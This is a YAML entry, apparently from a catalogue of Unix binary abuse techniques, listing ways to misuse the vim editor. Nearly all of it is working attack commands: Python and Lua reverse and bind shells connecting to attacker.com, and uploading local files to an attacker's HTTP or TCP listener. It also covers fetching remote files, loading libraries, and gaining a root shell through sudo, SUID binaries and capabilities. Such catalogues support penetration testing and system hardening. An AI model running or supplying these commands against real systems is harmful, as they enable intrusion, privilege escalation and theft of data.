--- functions: shell: - code: vim -c ':!/bin/sh' - code: | vim :set shell=/bin/sh :shell - description: This requires that `vim` is compiled with Python support. Prepend `:py3` for Python 3. code: vim -c ':py import os; os.execl("/bin/sh", "sh", "-c", "reset; exec sh")' - description: This requires that `vim` is compiled with Lua support. code: vim -c ':lua os.execute("reset; exec sh")' reverse-shell: - description: This requires that `vim` is compiled with Python support. Prepend `:py3` for Python 3. Run ``socat file:`tty`,raw,echo=0 tcp-listen:12345`` on the attacker box to receive the shell. code: | export RHOST=attacker.com export RPORT=12345 vim -c ':py import vim,sys,socket,os,pty;s=socket.socket() s.connect((os.getenv("RHOST"),int(os.getenv("RPORT")))) [os.dup2(s.fileno(),fd) for fd in (0,1,2)] pty.spawn("/bin/sh") vim.command(":q!")' non-interactive-reverse-shell: - description: Run ``nc -l -p 12345`` on the attacker box to receive the shell. This requires that `vim` is compiled with Lua support and that `lua-socket` is installed. code: | export RHOST=attacker.com export RPORT=12345 vim -c ':lua local s=require("socket"); local t=assert(s.tcp()); t:connect(os.getenv("RHOST"),os.getenv("RPORT")); while true do local r,x=t:receive();local f=assert(io.popen(r,"r")); local b=assert(f:read("*a"));t:send(b); end; f:close();t:close();' non-interactive-bind-shell: - description: Run `nc target.com 12345` on the attacker box to connect to the shell. This requires that `vim` is compiled with Lua support and that `lua-socket` is installed. code: | export LPORT=12345 vim -c ':lua local k=require("socket"); local s=assert(k.bind("*",os.getenv("LPORT"))); local c=s:accept(); while true do local r,x=c:receive();local f=assert(io.popen(r,"r")); local b=assert(f:read("*a"));c:send(b); end;c:close();f:close();' file-upload: - description: This requires that `vim` is compiled with Python support. Prepend `:py3` for Python 3. Send local file via "d" parameter of a HTTP POST request. Run an HTTP service on the attacker box to collect the file. code: | export URL=http://attacker.com/ export LFILE=file_to_send vim -c ':py import vim,sys; from os import environ as e if sys.version_info.major == 3: import urllib.request as r, urllib.parse as u else: import urllib as u, urllib2 as r r.urlopen(e["URL"], bytes(u.urlencode({"d":open(e["LFILE"]).read()}).encode())) vim.command(":q!")' - description: This requires that `vim` is compiled with Python support. Prepend `:py3` for Python 3. Serve files in the local folder running an HTTP server. code: | export LPORT=8888 vim -c ':py import vim,sys; from os import environ as e if sys.version_info.major == 3: import http.server as s, socketserver as ss else: import SimpleHTTPServer as s, SocketServer as ss ss.TCPServer(("", int(e["LPORT"])), s.SimpleHTTPRequestHandler).serve_forever() vim.command(":q!")' - description: Send a file to a TCP port. Run `nc -l -p 12345 > "file_to_save"` on the attacker box to collect the file. This requires that `vim` is compiled with Lua support and that `lua-socket` is installed. code: | export RHOST=attacker.com export RPORT=12345 export LFILE=file_to_send vim -c ':lua local f=io.open(os.getenv("LFILE"), 'rb') local d=f:read("*a") io.close(f); local s=require("socket"); local t=assert(s.tcp()); t:connect(os.getenv("RHOST"),os.getenv("RPORT")); t:send(d); t:close();' file-download: - description: This requires that `vim` is compiled with Python support. Prepend `:py3` for Python 3. Fetch a remote file via HTTP GET request. code: | export URL=http://attacker.com/file_to_get export LFILE=file_to_save vim -c ':py import vim,sys; from os import environ as e if sys.version_info.major == 3: import urllib.request as r else: import urllib as r r.urlretrieve(e["URL"], e["LFILE"]) vim.command(":q!")' - description: Fetch remote file sent to a local TCP port. Run `nc target.com 12345 < "file_to_send"` on the attacker box to send the file. This requires that `vim` is compiled with Lua support and that `lua-socket` is installed. code: | export LPORT=12345 export LFILE=file_to_save vim -c ':lua local k=require("socket"); local s=assert(k.bind("*",os.getenv("LPORT"))); local c=s:accept(); local d,x=c:receive("*a"); c:close(); local f=io.open(os.getenv("LFILE"), "wb"); f:write(d); io.close(f);' file-write: - code: | vim file_to_write iDATA ^[ w file-read: - code: vim file_to_read library-load: - description: This requires that `vim` is compiled with Python support. Prepend `:py3` for Python 3. code: vim -c ':py import vim; from ctypes import cdll; cdll.LoadLibrary("lib.so"); vim.command(":q!")' suid: - description: This requires that `vim` is compiled with Python support. Prepend `:py3` for Python 3. code: ./vim -c ':py import os; os.execl("/bin/sh", "sh", "-pc", "reset; exec sh -p")' sudo: - code: sudo vim -c ':!/bin/sh' - description: This requires that `vim` is compiled with Python support. Prepend `:py3` for Python 3. code: sudo vim -c ':py import os; os.execl("/bin/sh", "sh", "-c", "reset; exec sh")' - description: This requires that `vim` is compiled with Lua support. code: sudo vim -c ':lua os.execute("reset; exec sh")' capabilities: - description: This requires that `vim` is compiled with Python support. Prepend `:py3` for Python 3. code: ./vim -c ':py import os; os.setuid(0); os.execl("/bin/sh", "sh", "-c", "reset; exec sh")' limited-suid: - description: This requires that `vim` is compiled with Lua support. code: ./vim -c ':lua os.execute("reset; exec sh")' ---